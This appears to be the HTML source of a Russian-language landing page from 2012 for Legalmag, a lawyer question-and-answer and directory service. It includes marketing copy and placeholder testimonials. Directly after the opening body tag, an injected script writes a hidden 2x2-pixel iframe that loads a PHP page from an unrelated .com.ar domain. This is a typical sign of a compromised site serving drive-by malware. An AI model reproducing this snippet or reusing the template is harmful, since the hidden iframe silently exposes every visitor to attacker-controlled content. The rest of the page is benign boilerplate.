<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="login">
					<a class="enter" href="">Войти</a>
					<a class="register" href="">Зарегистрироваться</a>
				</div>
				<nav><!--top-navigation-->
					<ul>
						<li ><a href="">Лента вопросов</a></li>
						<li><a href="">Каталог</a></li>
						<li ><a href="">Вопросы и ответы</a></li>
						<li class="active"><a href="">Как это работает?</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<div id="benefitsUserBlock">
					<div class="right">
						<p>Почему Legalmag?</p>
						<span>1. Настоящие юристы<br>
							 2. настоящие ответы<br>
							3. Всегда с вами. Всегда рядом</span>
						<div id="usrRegister">
							<a href="">
							<span>Есть вопрос?</span><br>
							Задайте его сейчас &raquo;
							</a>
						</div>
					</div>
				</div>
				<div class="haveQuestionBlock">
					<p><span>У вас есть вопрос?</span> Чем поможет вам Legalmag:</p>
					<ul>
						<li>
							<div class="left"><img src="design/img/numberOne.png" alt="1"></div>
							<div class="right">
								<p>Задайте вопрос</p>
								Legalmag отправит ваш вопрос правильным юристам
							</div>
						</li>
						<li>
							<div class="left"><img src="design/img/numberTwo.png" alt="2"></div>
							<div class="right">
								<p>Получите ответы</p>
								На ваш вопрос могут ответить несколько юристов. Вы узнаете несоклько точек зрени
							</div>
						</li>
						<li>
							<div class="left"><img src="design/img/numberThree.png" alt="3"></div>
							<div class="right">
								<p>Решите свою проблему</p>
								Вы можете связаться с понравившимися вам юристам и нанять их для решения вопроса
							</div>
						</li>
					</ul>
				</div>
				<div class="clear">&nbsp;</div>
				<div class="haveQuestionBlock">
					<p><span>Ищите юриста?</span> Чем поможет вам Legalmag:</p>
					<ul>
						<li>
							<div class="left"><img src="design/img/numberOne.png" alt="1"></div>
							<div class="right">
								<p>Создайте объявление</p>
								Опубликуйте разовый проект или вакансию. Legalmag отправит объявление подходящим юристам
							</div>
						</li>
						<li>
							<div class="left"><img src="design/img/numberTwo.png" alt="2"></div>
							<div class="right">
								<p>Используйте поиск</p>
								Найдите юриста на карте или в поиске? На Legalmag тысячи юристов.
							</div>
						</li>
						<li>
							<div class="left"><img src="design/img/numberThree.png" alt="3"></div>
							<div class="right">
								<p>Выберите подходящего специалиста</p>
								Система рейтингов и подробная информация о специалистах позволит вам определиться с выбором
							</div>
						</li>
					</ul>
				</div>
				<div class="clear">&nbsp;</div>
				<div id="join"><h2>LegalMag пользуются тысячи юристов.</h2><a href="">Присоединяйтесь &raquo;</a></div>
				<div class="clear">&nbsp;</div>
				<div class="benefitsComment">
					<div class="left">
						<img  src="design/images/pasha.jpg" alt="">
					</div>
					<div class="right">
						<div class="benefitCommentBody">
							<h2>Вы не потеряетесь в большом каталоге юристов: система рейтингов </h2>
							<p>Разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: </p>
							<div class="benefitsCommentSay"></div>
						</div>
					</div>
					<div class="clear">&nbsp;</div>
					<div class="benefitsAuthor"><span>Иванов Иван</span>, директор мира</div>
					<div class="clear">&nbsp;</div>
				</div>
				<div class="benefitsComment">
					<div class="left">
						<div class="benefitCommentBody">
							<h2>Вы не потеряетесь в большом каталоге юристов: система рейтингов </h2>
							<p>Разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: система рейтингов и разделение по специализации позволит найти вам нужного.Вы не потеряетесь в большом каталоге юристов: </p>
							<div class="benefitsCommentSayRight"></div>
						</div>
					</div>
					<div class="right">
						<img  src="design/images/pasha.jpg" alt="">
					</div>
					<div class="clear">&nbsp;</div>
					<div class="benefitsAuthorLeft"><span>Иванов Иван</span>, директор мира</div>
				</div>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>